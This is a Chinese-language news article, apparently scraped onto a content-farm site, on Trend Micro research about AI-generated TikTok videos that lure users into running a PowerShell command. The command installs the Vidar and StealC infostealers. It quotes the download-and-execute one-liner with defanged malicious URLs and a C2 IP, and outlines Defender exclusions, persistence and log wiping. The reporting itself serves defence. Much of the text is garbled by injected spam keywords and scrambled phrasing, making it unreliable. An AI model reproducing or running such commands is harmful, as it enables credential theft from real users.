您现在的位置是:网络安全 >>正文
AI 生成恶意软件:TikTok 视频通过 PowerShell 命令传播信息窃取程序
网络安全3665人已围观
简介趋势科技Trend Micro)最新研究揭露,TikTok平台正出现一种新型威胁:AI生成的视频诱骗用户执行恶意PowerShell命令,使其暴露在强大的信息窃取恶意软件风险之下。导致Vidar和St ...
趋势科技(Trend Micro)最新研究揭露,生成视频TikTok平台正出现一种新型威胁 :AI生成的恶意视频诱骗用户执行恶意PowerShell命令 ,使其暴露在强大的软件信息窃取恶意软件风险之下。

导致Vidar和StealC恶意软件的通过感染链条 | 图片来源:Trend Micro
社交工程攻击新手法趋势科技近期曝光了一起危险的社交工程攻击活动,黑客利用TikTok的服务器租用命令病毒式传播平台分发Vidar和StealC——两种复杂的信息窃取恶意软件家族。网络犯罪分子通过AI生成内容和利用用户信任,传播程序将看似无害的信息视频教程转变为恶意软件传播载体 。
报告指出 :"这类攻击使用视频(可能由AI生成)诱导用户执行PowerShell命令 ,生成视频这些命令被伪装成软件激活步骤。恶意"
攻击传播机制攻击始于@gitallowed、模板下载软件@zane.houghton和@sysglow.wow等TikTok账号分享的通过匿名教程视频,指导观众激活Windows 、命令Spotify或CapCut等软件。传播程序部分视频播放量超过50万次,信息展示的生成视频"激活"步骤最终会引导用户执行如下PowerShell命令:
复制iex (irm hxxps://allaivo[.]me/spotify)1.趋势科技强调:"视频指示观众运行一系列命令...指导语音也疑似AI生成,进一步表明攻击者使用AI工具制作这些视频 。云计算"
该命令会下载并执行远程脚本,启动一个兼具隐蔽性和持久性的恶意软件投放链 。
攻击流程详解用户观看TikTok视频后直接执行PowerShell命令从hxxps://allaivo[.]me/spotify下载并运行远程脚本在APPDATA和LOCALAPPDATA创建隐藏目录 ,并添加到Windows Defender排除列表下载二级有效载荷——通常是从hxxps://amssh[.]co/file.exe获取的Vidar或StealC从hxxps://amssh[.]co/script.ps1获取最终持久化脚本,使恶意软件能在系统重启后继续运行删除日志和临时文件夹以掩盖取证证据趋势科技警告称:"脚本采用重试逻辑确保有效载荷成功下载,源码下载然后以隐藏的提升权限进程启动恶意软件可执行文件。"
新型C&C通信技术恶意软件激活后,会使用新型规避技术与命令控制(C&C)服务器通信 :
Vidar利用Steam和Telegram等平台作为Dead Drop Resolvers(DDR ,死投解析器) ,将真实服务器地址隐藏在个人资料元数据中StealC直接连接基于IP的终端(如91[.]92[.]46[.]70)研究人员指出 :"Vidar尤其滥用Steam和Telegram等合法服务作为死投解析器 。"
AI驱动的建站模板恶意软件新时代TikTok算法放大效应与AI生成欺骗手段的结合,标志着恶意软件传播进入新时代。正如趋势科技强调:"AI生成内容的使用 ,使这类攻击从孤立事件升级为高度可扩展的运营活动。"
高防服务器Tags:
转载:欢迎各位朋友分享到网络,但转载请说明文章出处“算法与编程”。http://www.bzli.cn/news/917e299080.html
相关文章
亚洲航空公司遭到勒索软件攻击,乘客及雇员的资料被窃取
网络安全亚洲航空集团承诺在收集个人信息时负责任,并“尽一切可能”保护隐私。请注意,这不是合同,而只是他们所表达的承诺。11月11日和12日,亚洲航空集团遭到了Daixin Team团伙的勒索软件攻击。CISA ...
【网络安全】
阅读更多雷神911-s6评测(一款高性能游戏本的全面分析)
网络安全雷神911-s6是一款备受瞩目的高性能游戏本,它不仅在硬件配置上拥有强大的竞争力,同时还具备独特的设计风格和出色的游戏体验。本文将从多个方面对雷神911-s6进行深度评测,带您全面了解这款游戏本的优势 ...
【网络安全】
阅读更多西部数据新元素的革新之路(以西部数据新元素为例,探究创新科技带来的变革)
网络安全随着科技的不断进步,各行各业都在不断迎来创新和变革。本文以西部数据新元素为例,将探讨其在科技领域的革新之路,并分析创新科技带来的重大影响。1.西部数据:引领科技变革的先驱-描述西部数据作为一家领先的科 ...
【网络安全】
阅读更多
热门文章
最新文章
友情链接
- 手机安装APP提示解析错误怎么办
- 康达智控(探索智能控制未来,康达智控扬帆起航)
- 使用U盘制作Win10系统的教程(简单易懂的Win10系统安装指南,教你轻松搞定)
- 手机开免提对方听不到声音怎么回事
- Excel突出显示前10%数据的方法
- 磁盘损坏(从备份到专业工具,多种修复方法帮您解决磁盘损坏的问题)
- 索泰1070性能评测及用户体验(一款强劲的显卡,为你带来出色的游戏体验)
- i7-4720HQ(i7-4720HQ的技术特点与应用领域)
- 显卡不接电源会带来什么后果?(揭开显卡不接电源的秘密,了解风险与解决之道)
- 奔腾J3710处理器的性能和特点分析(探索奔腾J3710处理器在性能、功耗和多媒体表现方面的优势) 云服务器网站建设香港物理机b2b信息平台企业服务器源码库亿华云